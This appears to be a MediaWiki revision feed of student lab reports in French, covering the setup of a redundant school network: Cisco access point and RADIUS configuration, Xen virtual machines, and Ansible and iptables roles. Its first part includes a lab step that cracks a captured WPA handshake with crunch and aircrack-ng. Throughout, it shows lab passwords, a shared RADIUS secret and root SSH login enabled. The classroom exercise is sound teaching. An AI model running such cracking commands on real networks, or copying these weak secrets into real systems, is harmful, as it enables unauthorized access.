 apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
Pour installer cette utilitaire nous pouvons relier l'eeePc au réseau de l'école à l'aide du deuxième câble ethernet disponnible à l'arrière des zabeth :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:branchement_eee_pc.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une fois installé nous pouvons générer le dictionnaire :&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Une fois généré, nous pouvons lancer la précédure de crackage (qui peut être très longue) :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:04 psk*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Crackage_wpa.png|center|thumb|500px|Crackage WPA]]&lt;br /&gt;
&lt;br /&gt;
'''5.5  Intrusion sur un serveur d’application Web'''&lt;br /&gt;
[[Fichier:Wiki intrusion 5.5.zip]]&lt;br /&gt;
&lt;br /&gt;
= Configuration point d'accès WiFI =&lt;br /&gt;
&lt;br /&gt;
Configuration du point d'accès WiFi E304 (primaire) :&lt;br /&gt;
&lt;br /&gt;
Installation de minicom sur macos : &lt;br /&gt;
 brew install minicom&lt;br /&gt;
&lt;br /&gt;
Récupération du nom du point d'accès connecté en USB (mac Os):&lt;br /&gt;
 ls /dev/cu*&lt;br /&gt;
&lt;br /&gt;
On obtient (en branchant et débranchant on identifie l'appareil qui apparait): &lt;br /&gt;
 /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur WiFi :&lt;br /&gt;
 minicom -os&lt;br /&gt;
&lt;br /&gt;
Configuration à ajouter :&lt;br /&gt;
 Nom de device : /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
 Baudrate : 9600 8N1&lt;br /&gt;
&lt;br /&gt;
Sources : &lt;br /&gt;
- https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5_2021/2022_G6&lt;br /&gt;
- https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau006.html#sec29&lt;br /&gt;
&lt;br /&gt;
 enable =&amp;gt; Passer en root (mdp : Cisco si par défaut)&lt;br /&gt;
 conf t &lt;br /&gt;
 hostname wifi-ima5sc-e304 =&amp;gt; (optionnel) on donne un nom à notre point d'accès&lt;br /&gt;
 ip domain-name plil.info =&amp;gt; ajoute un nom de domaine (utilisé pour la création de certificats)&lt;br /&gt;
 &lt;br /&gt;
Activation du ssh :&lt;br /&gt;
 &lt;br /&gt;
 crypto key generate rsa general-keys modulus 2048 =&amp;gt; Génération clés publique/privée &lt;br /&gt;
 ip ssh version 2 =&amp;gt; Activation ssh&lt;br /&gt;
&lt;br /&gt;
Configuration de l'authentification sur le point d'accès :&lt;br /&gt;
&lt;br /&gt;
 aaa new-model&lt;br /&gt;
 aaa authentication login eap_marguerite group radius_marguerite&lt;br /&gt;
 radius-server host 193.48.57.177 auth-port 1812 acct-port 1813 key secret_marguerite&lt;br /&gt;
 aaa group server radius radius_marguerite&lt;br /&gt;
 server 193.48.57.177 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 dot11 ssid SSID_MARGUERITE&lt;br /&gt;
 vlan 11&lt;br /&gt;
  authentication open eap eap_marguerite&lt;br /&gt;
  authentication network-eap eap_marguerite&lt;br /&gt;
  authentication key-management wpa&lt;br /&gt;
  mbssid guest-mode&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Association du SSID à l'interface Wi-Fi :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 interface Dot11Radio0&lt;br /&gt;
  encryption vlan 11 mode ciphers aes-ccm tkip&lt;br /&gt;
  ssid SSID_MARGUERITE&lt;br /&gt;
  mbssid&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration du Vlan 11 :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 interface Dot11Radio0.11&lt;br /&gt;
  encapsulation dot1Q 11&lt;br /&gt;
  no ip route-cache&lt;br /&gt;
  bridge-group 11&lt;br /&gt;
  bridge-group 11 subscriber-loop-control&lt;br /&gt;
  bridge-group 11 spanning-disabled&lt;br /&gt;
  bridge-group 11 block-unknown-source&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration interface filaire :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet0.11&lt;br /&gt;
  encapsulation dot1Q 11&lt;br /&gt;
  bridge-group 11&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'IP du point d'accès et sa Gateway (n'est pas à faire par tous les groupes) :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
  ip default-gateway 10.1.0.2&lt;br /&gt;
  interface BVI 1&lt;br /&gt;
   ip address 10.1.0.4 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
'''Configuration du routeur en e304 :''' &lt;br /&gt;
&lt;br /&gt;
Configuration du VLAN1 :&lt;br /&gt;
  conf t&lt;br /&gt;
  interface vlan 1&lt;br /&gt;
   ip address 10.1.0.2 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Configuration du port sur lequel est branché l'AP en mode trunk : &lt;br /&gt;
&lt;br /&gt;
  conf t&lt;br /&gt;
  interface Gi4/2&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
   switchport trunk allowed vlan add 1&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
= Serveur FreeRadius =&lt;br /&gt;
&lt;br /&gt;
Installation de freeRADIUS&lt;br /&gt;
&lt;br /&gt;
 apt install freeradius&lt;br /&gt;
&lt;br /&gt;
On commence par configurer &amp;lt;code&amp;gt;/etc/freeradius/3.0/clients.conf&amp;lt;/code&amp;gt; à détailler&lt;br /&gt;
&lt;br /&gt;
 client marguerite {&lt;br /&gt;
 	ipaddr = 10.1.0.4/24&lt;br /&gt;
 	secret = secret_marguerite&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
ensuite &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enabled/eap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 eap {&lt;br /&gt;
   [...]&lt;br /&gt;
   default_eap_type = peap&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
puis &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 root Cleartext-Password := &amp;quot;glopglop&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne bien, on peut lancer freeradius en mode debug &amp;lt;code&amp;gt;freeradius -X&amp;lt;/code&amp;gt; (après avoir au préalable stoppé le processus)&lt;br /&gt;
&lt;br /&gt;
= Réalisations =&lt;br /&gt;
'''6.2 Chiffrement de données '''&lt;br /&gt;
&lt;br /&gt;
On se met en root sur une zabeth et on affiche les périphériques avec lsblk.&lt;br /&gt;
&lt;br /&gt;
On s'interesse au périphérique suivant :&lt;br /&gt;
 sdb      8:16   1   7.6G  0 disk &lt;br /&gt;
 └─sdb1   8:17   1   7.6G  0 part /media/pifou/USB DISK&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Ferme de serveurs Web =&lt;br /&gt;
&lt;br /&gt;
Installation VM xen :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/pra-07.cfg&lt;br /&gt;
&lt;br /&gt;
Configuration IP :&lt;br /&gt;
&lt;br /&gt;
Dans /etc/network/interfaces :&lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 172.26.145.102&lt;br /&gt;
 netmask 255.255.255.0&lt;br /&gt;
 gateway 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Vérifier si on a bien la passerelle par défaut de configurer &lt;br /&gt;
&lt;br /&gt;
 ip r&lt;br /&gt;
&lt;br /&gt;
On peut pinger le routeur :&lt;br /&gt;
&lt;br /&gt;
 ping 172.26.154.254&lt;br /&gt;
&lt;br /&gt;
Mais pas les addresses ipv4 routée :&lt;br /&gt;
&lt;br /&gt;
 ping 8.8.8.8 échoue &lt;br /&gt;
&lt;br /&gt;
Redémarage service networking&lt;br /&gt;
&lt;br /&gt;
 service networking restart&lt;br /&gt;
&lt;br /&gt;
Si ça n'est pas suffisant :&lt;br /&gt;
&lt;br /&gt;
 ifdown eth0&lt;br /&gt;
 ifup eth0&lt;br /&gt;
 &lt;br /&gt;
Dans /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Redémarage service ssh&lt;br /&gt;
export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 service sshd restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'une clé ssh sur la zabeth et ajout de cette clé dans les clés autorisées de la vm de pra :&lt;br /&gt;
&lt;br /&gt;
 ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519 -C &amp;quot;aviran.tetia@polytech-lille.net&amp;quot; -P &amp;quot;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
On copie le contenu de la clé crée :&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/id_ed25519.pub&lt;br /&gt;
&lt;br /&gt;
On colle son contenu dans les clé authorisées de la VM (fichier ~/.ssh/authorized_keys) :&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/authorized_keys &lt;br /&gt;
 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDZfT1XxI7Zmqd07dup81hztaYKwLLapjhORHWmxUUCJ aviran.tetia@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Correction de la source list de la VM pour pouvoir utiliser apt correctement :&lt;br /&gt;
&lt;br /&gt;
On remplace les deux dernières lignes par :&lt;br /&gt;
&lt;br /&gt;
 deb     http://security.debian.org/debian-security bullseye-security main contrib non-free&lt;br /&gt;
 deb-src http://security.debian.org/debian-security bullseye-security  main contrib non-free&lt;br /&gt;
 &lt;br /&gt;
Installation de python sur la VM :&lt;br /&gt;
&lt;br /&gt;
 apt update &lt;br /&gt;
 apt install python3&lt;br /&gt;
&lt;br /&gt;
Création d'un venv pour l'éxecution :&lt;br /&gt;
&lt;br /&gt;
 python3 -m venv ~/env-ansible&lt;br /&gt;
 . ~/env-ansible/bin/activate&lt;br /&gt;
 pip3 install -U setuptools wheel&lt;br /&gt;
 pip3 install -U ansible&lt;br /&gt;
&lt;br /&gt;
On crée l'arborescence suivante :&lt;br /&gt;
 &lt;br /&gt;
 └── roles&lt;br /&gt;
    ├── base&lt;br /&gt;
    │   ├── tasks&lt;br /&gt;
    │   │   └── main.yml&lt;br /&gt;
    │   └── templates&lt;br /&gt;
    │       ├── hostname.j2&lt;br /&gt;
    │       └── hosts.j2&lt;br /&gt;
    └── ssh_key&lt;br /&gt;
        ├── tasks&lt;br /&gt;
        │   └── main.yml&lt;br /&gt;
        └── templates&lt;br /&gt;
            └── keys.j2&lt;br /&gt;
&lt;br /&gt;
Dans main.yml :&lt;br /&gt;
 - name: &amp;quot;Setup sshkeys&amp;quot;&lt;br /&gt;
  template:&lt;br /&gt;
    src: keys.j2&lt;br /&gt;
    dest: /root/.ssh/authorized_keys&lt;br /&gt;
    owner: root&lt;br /&gt;
    group: root&lt;br /&gt;
    mode: &amp;quot;0600&amp;quot;&lt;br /&gt;
&lt;br /&gt;
/!\ ne pas mettre de tabulation dans ce fichier, uniquement des espaces&lt;br /&gt;
&lt;br /&gt;
Dans keys.j2 :&lt;br /&gt;
  {% for item in ssh_keys %}&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;{{ item.key }}&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 {% endfor %}&lt;br /&gt;
&lt;br /&gt;
Ajout d'une clef dans les variables de groupe group_vars/all.yaml :&lt;br /&gt;
 &lt;br /&gt;
 ssh_keys:&lt;br /&gt;
  # if you don't install this i won't be able to get into your nodes to help you debug :)&lt;br /&gt;
  - name: tmaurice@thonkpad&lt;br /&gt;
    key: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPrw78OSJACq5MFXHrhAr2bPpnTNxwLE85mzij8gKmCs thomas@thonkpad&lt;br /&gt;
    # add more keys here&lt;br /&gt;
  - name: aviran.tetia@polytech-lille.net&lt;br /&gt;
    key: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDZfT1XxI7Zmqd07dup81hztaYKwLLapjhORHWmxUUCJ aviran.tetia@polytech-lille.net &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis lancer la commande :&lt;br /&gt;
&lt;br /&gt;
 ansible-playbook -v -i inventory polytech.yaml&lt;br /&gt;
&lt;br /&gt;
Vérification dans le fichier /root/.ssh/authorized_keys  :&lt;br /&gt;
 &lt;br /&gt;
 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPrw78OSJACq5MFXHrhAr2bPpnTNxwLE85mzij8gKmCs thomas@thonkpad &lt;br /&gt;
 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDZfT1XxI7Zmqd07dup81hztaYKwLLapjhORHWmxUUCJ aviran.tetia@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Nous obtenons bien toutes nos clefs ssh.&lt;br /&gt;
&lt;br /&gt;
Ajout des var d'environement pour pouvoir installer docker :&lt;br /&gt;
&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Installation du rôle Docker :&lt;br /&gt;
 &lt;br /&gt;
 ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Puis dans polytech.yml :&lt;br /&gt;
&lt;br /&gt;
 - hosts: all&lt;br /&gt;
   roles:&lt;br /&gt;
    ...&lt;br /&gt;
    - geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après ré-execution du playbook, nous pouvons vérifier que Docker est bien installé : &lt;br /&gt;
&lt;br /&gt;
 docker -v &lt;br /&gt;
&lt;br /&gt;
Installation du Pare-feu :&lt;br /&gt;
&lt;br /&gt;
source : https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5_2021/2022_G6&lt;br /&gt;
&lt;br /&gt;
- création de roles/iptables/tasks/main.yml :&lt;br /&gt;
&lt;br /&gt;
 ---&lt;br /&gt;
&lt;br /&gt;
 - name: Allow ports INPUT tcp&lt;br /&gt;
  iptables:&lt;br /&gt;
    chain: INPUT&lt;br /&gt;
    protocol: tcp&lt;br /&gt;
    destination_port: &amp;quot;{ { item } }&amp;quot;&lt;br /&gt;
    jump: ACCEPT&lt;br /&gt;
    ctstate: NEW,ESTABLISHED&lt;br /&gt;
  loop: &amp;quot;{ { iptables_accepted_tcp_ports } }&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 - name: Allow ports INPUT udp&lt;br /&gt;
  iptables:&lt;br /&gt;
    chain: INPUT&lt;br /&gt;
    protocol: udp&lt;br /&gt;
    destination_port: &amp;quot;{ { item } }&amp;quot;&lt;br /&gt;
    jump: ACCEPT&lt;br /&gt;
    ctstate: NEW,ESTABLISHED&lt;br /&gt;
  loop: &amp;quot;{ { iptables_accepted_udp_ports } }&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 - name: Set the policy for the INPUT chain to DROP&lt;br /&gt;
  ansible.builtin.iptables:&lt;br /&gt;
    chain: INPUT&lt;br /&gt;
    policy: DROP&lt;br /&gt;
&lt;br /&gt;
- Cration du fichier de variables :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 iptables_accepted_tcp_ports:&lt;br /&gt;
  - 8600&lt;br /&gt;
  - 8500&lt;br /&gt;
  - 8501&lt;br /&gt;
  - 8502&lt;br /&gt;
  - 8301&lt;br /&gt;
  - 8302&lt;br /&gt;
  - 8300 &lt;br /&gt;
  - 22&lt;br /&gt;
  - 80&lt;br /&gt;
  - 443&lt;br /&gt;
&lt;br /&gt;
 iptables_accepted_udp_ports:&lt;br /&gt;
  - 8600&lt;br /&gt;
  - 8301&lt;br /&gt;
  - 8302&lt;br /&gt;
  - 22&lt;br /&gt;
  - 80&lt;br /&gt;
  - 443&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=58078</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=58078"/>
				<updated>2022-01-12T16:26:57Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* HTTPS / Certificat SSL */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= Sujet =&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce TP est de créer un réseau redondé &lt;br /&gt;
Lien : https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/&lt;br /&gt;
&lt;br /&gt;
= Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 11 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
